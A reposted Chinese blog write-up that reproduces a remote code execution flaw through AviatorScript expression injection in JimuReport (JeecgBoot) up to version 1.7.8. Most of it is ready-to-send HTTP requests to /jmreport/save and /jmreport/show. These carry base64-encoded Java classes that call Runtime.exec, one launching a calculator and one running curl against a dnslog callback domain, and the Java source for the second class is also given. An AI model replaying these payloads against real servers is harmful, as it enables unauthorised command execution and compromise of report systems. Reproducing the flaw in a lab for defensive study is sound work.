JeecgBoot积木报表AviatorScript表达式注入漏洞复现

news/2024/11/14 20:55:03/文章来源:https://www.cnblogs.com/CVE-Lemon/p/18392679

漏洞信息

影响组件:JimuReport积木报表

影响版本:v1.6.0 < JimuReport ≤ 1.7.8

漏洞名称:AviatorScript表达式注入漏洞

漏洞链接:积木报表软件存在AviatorScript代码注入RCE漏洞 · Issue #2848

漏洞描述:

积木报表软件存在AviatorScript代码注入RCE漏洞

使用接口/jmreport/save处在text中写入AviatorScript表达式访问/jmreport/show触发AviatorScript解析从而导致命令执行。

漏洞复现

环境搭建

使用积木报表v1.7.8复现,下载链接:Release v1.7.8 · jeecgboot/JimuReport

用idea打开,使用maven下载依赖之后,运行com.jeecg.modules.JimuReportApplication

访问http://192.168.171.1:8085/,搭建成功:

poc复现

poc来源:https://github.com/wy876/POC/blob/main/JeecgBoot/JeecgBoot系统AviatorScript表达式注入漏洞.md

POST /jeecg-boot/jmreport/save?previousPage=xxx&jmLink=YWFhfHxiYmI=&token=123 HTTP/1.1
Host: 192.168.37.1:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Content-Type: application/json
Content-Length: 3456{"loopBlockList": [],"area": false,"printElWidth": 718,"excel_config_id": "980882669965455363","printElHeight": 1047,"rows": {"4": {"cells": {"4": {"text": "=(use org.springframework.cglib.core.*;use org.springframework.util.*;ReflectUtils.defineClass('test', Base64Utils.decodeFromString('yv66vgAAADQANgoACQAlCgAmACcIACgKACYAKQcAKgcAKwoABgAsBwAtBwAuAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAZMdGVzdDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcALwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4BAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAKgEAClNvdXJjZUZpbGUBAAl0ZXN0LmphdmEMAAoACwcAMAwAMQAyAQAEY2FsYwwAMwA0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEAGmphdmEvbGFuZy9SdW50aW1lRXhjZXB0aW9uDAAKADUBAAR0ZXN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABgoTGphdmEvbGFuZy9UaHJvd2FibGU7KVYAIQAIAAkAAAAAAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAJAA4AAAAMAAEAAAAFAA8AEAAAAAEAEQASAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAAWAA4AAAAgAAMAAAABAA8AEAAAAAAAAQATABQAAQAAAAEAFQAWAAIAFwAAAAQAAQAYAAEAEQAZAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAAbAA4AAAAqAAQAAAABAA8AEAAAAAAAAQATABQAAQAAAAEAGgAbAAIAAAABABwAHQADABcAAAAEAAEAGAAIAB4ACwABAAwAAABmAAMAAQAAABe4AAISA7YABFenAA1LuwAGWSq3AAe/sQABAAAACQAMAAUAAwANAAAAFgAFAAAADQAJABAADAAOAA0ADwAWABEADgAAAAwAAQANAAkAHwAgAAAAIQAAAAcAAkwHACIJAAEAIwAAAAIAJA=='), ClassLoader.getSystemClassLoader());)","style": 0}},"height": 25},"len": 96,"-1": {"cells": {"-1": {"text": "${gongsi.id}"}},"isDrag": true}},"dbexps": [],"toolPrintSizeObj": {"printType": "A4","widthPx": 718,"heightPx": 1047},"dicts": [],"freeze": "A1","dataRectWidth": 701,"background": false,"name": "sheet1","autofilter": {},"styles": [{"align": "center"}],"validations": [],"cols": {"4": {"width": 95},"len": 50},"merges": ["E4:F4","B4:B5","C4:C5","D4:D5","G4:G5","H4:H5","I4:I5","D1:G1","H3:I3"]
}
POST /jeecg-boot/jmreport/show?previousPage=xxx&jmLink=YWFhfHxiYmI= HTTP/1.1
Host: 192.168.37.1:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Content-Type: application/json
Content-Length: 42{"id": "980882669965455363"
}

反编译poc里的字节码,可以看到是调用Runtime.getRuntime.exec来执行系统命令启动计算器:

发送poc,可以看到成功调用了计算器

DNSLog验证

使用https://dnslog.org/获得一个域名:

jeecg.e7b700c1.log.dnslog.biz.

编写poc:

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;public class test1 extends AbstractTranslet {public test1() {}public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}static {try {Runtime.getRuntime().exec("curl jeecg.e7b700c1.log.dnslog.biz.");} catch (IOException var1) {throw new RuntimeException(var1);}}
}

javac编译,然后base64编码字节码:

yv66vgAAADQAKQoACQAYCgAZABoIABsKABkAHAcAHQcAHgoABgAfBwAgBwAhAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACkV4Y2VwdGlvbnMHACIBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIPGNsaW5pdD4BAA1TdGFja01hcFRhYmxlBwAdAQAKU291cmNlRmlsZQEACnRlc3QxLmphdmEMAAoACwcAIwwAJAAlAQAjY3VybCBqZWVjZy5lN2I3MDBjMS5sb2cuZG5zbG9nLmJpei4MACYAJwEAE2phdmEvaW8vSU9FeGNlcHRpb24BABpqYXZhL2xhbmcvUnVudGltZUV4Y2VwdGlvbgwACgAoAQAFdGVzdDEBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAGChMamF2YS9sYW5nL1Rocm93YWJsZTspVgAhAAgACQAAAAAABAABAAoACwABAAwAAAAhAAEAAQAAAAUqtwABsQAAAAEADQAAAAoAAgAAAAkABAAKAAEADgAPAAIADAAAABkAAAADAAAAAbEAAAABAA0AAAAGAAEAAAANABAAAAAEAAEAEQABAA4AEgACAAwAAAAZAAAABAAAAAGxAAAAAQANAAAABgABAAAAEAAQAAAABAABABEACAATAAsAAQAMAAAAVAADAAEAAAAXuAACEgO2AARXpwANS7sABlkqtwAHv7EAAQAAAAkADAAFAAIADQAAABYABQAAABQACQAXAAwAFQANABYAFgAYABQAAAAHAAJMBwAVCQABABYAAAACABc=

最终poc:

POST /jmreport/save?previousPage=xxx&jmLink=YWFhfHxiYmI=&token=123 HTTP/1.1
Host: 192.168.171.1:8085
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Content-Type: application/json
Content-Length: 3456{"loopBlockList": [],"area": false,"printElWidth": 718,"excel_config_id": "980882669965455363","printElHeight": 1047,"rows": {"4": {"cells": {"4": {"text": "=(use org.springframework.cglib.core.*;use org.springframework.util.*;ReflectUtils.defineClass('test1', Base64Utils.decodeFromString('yv66vgAAADQAKQoACQAYCgAZABoIABsKABkAHAcAHQcAHgoABgAfBwAgBwAhAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACkV4Y2VwdGlvbnMHACIBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIPGNsaW5pdD4BAA1TdGFja01hcFRhYmxlBwAdAQAKU291cmNlRmlsZQEACnRlc3QxLmphdmEMAAoACwcAIwwAJAAlAQAjY3VybCBqZWVjZy5lN2I3MDBjMS5sb2cuZG5zbG9nLmJpei4MACYAJwEAE2phdmEvaW8vSU9FeGNlcHRpb24BABpqYXZhL2xhbmcvUnVudGltZUV4Y2VwdGlvbgwACgAoAQAFdGVzdDEBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAGChMamF2YS9sYW5nL1Rocm93YWJsZTspVgAhAAgACQAAAAAABAABAAoACwABAAwAAAAhAAEAAQAAAAUqtwABsQAAAAEADQAAAAoAAgAAAAkABAAKAAEADgAPAAIADAAAABkAAAADAAAAAbEAAAABAA0AAAAGAAEAAAANABAAAAAEAAEAEQABAA4AEgACAAwAAAAZAAAABAAAAAGxAAAAAQANAAAABgABAAAAEAAQAAAABAABABEACAATAAsAAQAMAAAAVAADAAEAAAAXuAACEgO2AARXpwANS7sABlkqtwAHv7EAAQAAAAkADAAFAAIADQAAABYABQAAABQACQAXAAwAFQANABYAFgAYABQAAAAHAAJMBwAVCQABABYAAAACABc='), ClassLoader.getSystemClassLoader());)","style": 0}},"height": 25},"len": 96,"-1": {"cells": {"-1": {"text": "${gongsi.id}"}},"isDrag": true}},"dbexps": [],"toolPrintSizeObj": {"printType": "A4","widthPx": 718,"heightPx": 1047},"dicts": [],"freeze": "A1","dataRectWidth": 701,"background": false,"name": "sheet1","autofilter": {},"styles": [{"align": "center"}],"validations": [],"cols": {"4": {"width": 95},"len": 50},"merges": ["E4:F4","B4:B5","C4:C5","D4:D5","G4:G5","H4:H5","I4:I5","D1:G1","H3:I3"]
}
POST /jmreport/show?previousPage=xxx&jmLink=YWFhfHxiYmI= HTTP/1.1
Host: 192.168.171.1:8085
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Content-Type: application/json
Content-Length: 38{"id": "980882669965455363"
}

发送poc

成功请求dnslog

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/791164.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

flash详解

flash详解 什么是Flash Flash全名叫做Flash Memory,从名字就能看出,是种数据存储设备,存储设备有很多类,Flash属于非易失性存储设备(Non-volatile Memory Device),与此相对应的是易失性存储设备(Volatile Memory Device)。关于什么是非易失性/易失性,从名字中就可以看出,…

Dll 可执行文件的编写与调用

一、Dll 可执行文件的编写 首先我们需要在 VS 创建一个动态链接库(DLL)项目,然后会生成如下代码: // dllmain.cpp : 定义 DLL 应用程序的入口点。 #include "pch.h"BOOL APIENTRY DllMain( HMODULE hModule, // 指向 Dll 模块的句柄DWORD ul_reason_for_call, /…

rabbitmq高可用集群搭建

需求分析基本情况 在进行RabbitMQ搭建时,我们基于现有的连接数据和业务需求进行了深入分析。目前的统计数据显示,连接数为631,队列数为80418。为了确保业务需求的顺利满足,我们需要在云产品和自建RabbitMQ消息队列服务之间做出选择。 经过比较发现,即使选择腾讯云的最高规…

谈谈springboot中@Conditional相关注解

@Conditional是一个元注解@ConditionalOnClass(xx.class) 这是用于修饰一个类的注解。它主要是让你的代码具有兼容性,如在多模块下common模块中有一些仅仅是部分其他模块依赖、需要配置的类(例如rabbitMQ配置类,我相信他不应该被全模块需要,但是他放在常用模块中依旧是最合…

Categraf+VictoriaMetrics+Grafana网络设备监控方案

背景 应公司网工邀请,一起研究架设一套系统,对公司网络设备进行监控和预警。 基础 什么是SNMP 简单网络管理协议SNMP(Simple Network Management Protocol)用于网络设备的管理。 网络设备多种多样,不同设备不同厂家管理接口各不相同,于是snmp应运而生,SNMP作为广泛应用于…

Categraf+VictoriaMetrics+Grafana,网络设备监控方案

背景 应公司网工邀请,一起研究架设一套系统,对公司网络设备进行监控和预警。 基础 什么是SNMP 简单网络管理协议SNMP(Simple Network Management Protocol)用于网络设备的管理。 网络设备多种多样,不同设备不同厂家管理接口各不相同,于是snmp应运而生,SNMP作为广泛应用于…

Kubernetes存储卷

1. 存储卷基础 1.1 存储卷基础 从概念上讲,存储卷是可供Pod中的所有容器访问的目录Pod规范中声明的存储卷来源决定了目录的创建方式、使用的存储介质以及目录的初始内容存储卷插件(存储驱动)决定了支持的后端存储介质或存储服务,例如hostPath插件使用宿主机文件系统,而nfs…

一场 Kafka CRC 异常引发的血案

一、问题概述 客户的生产环境突然在近期间歇式的收到了Kafka CRC的相关异常,异常内容如下 Record batch for partition skywalking-traces-0 at offset 292107075 is invalid, cause: Record is corrupt (stored crc = 1016021496, compute crc = 1981017560) 报错没有规律性,…

机器学习之——决策树信息增益计算[附加计算程序]

0 前言本文主要介绍信息增益的计算公式并举出若干例子帮助理解。 读者需要具备的知识有:信息熵、条件熵。 本文所示用的数据集为:游玩数据集 1.1节1 信息增益计算公式g(D,A)表示在条件A下对于目标变量D的信息增益。 H(D)表示随机变量D的信息熵。 H(D|A)表示在随机变量A条件下…

2024秋软件工程个人作业(第一次)

这个作业属于哪个课程 https://edu.cnblogs.com/campus/fzu/SE2024这个作业要求在哪里 https://edu.cnblogs.com/campus/fzu/SE2024/homework/13243这个作业的目标 熟悉aigc,帮助老师和助教了解我,为软工课程之后的开展做准备学号 102202135markdown编辑器1、个人logo文生图任…

ue渲染关闭运动模糊

网上提供的一种方法是在渲染设置中关闭动态模糊,但是测试渲染还是会发生模糊。参考另一种方法是在渲染设置中添加控制台变量,设置 r.motionblurquality = 0。该方法测试通过!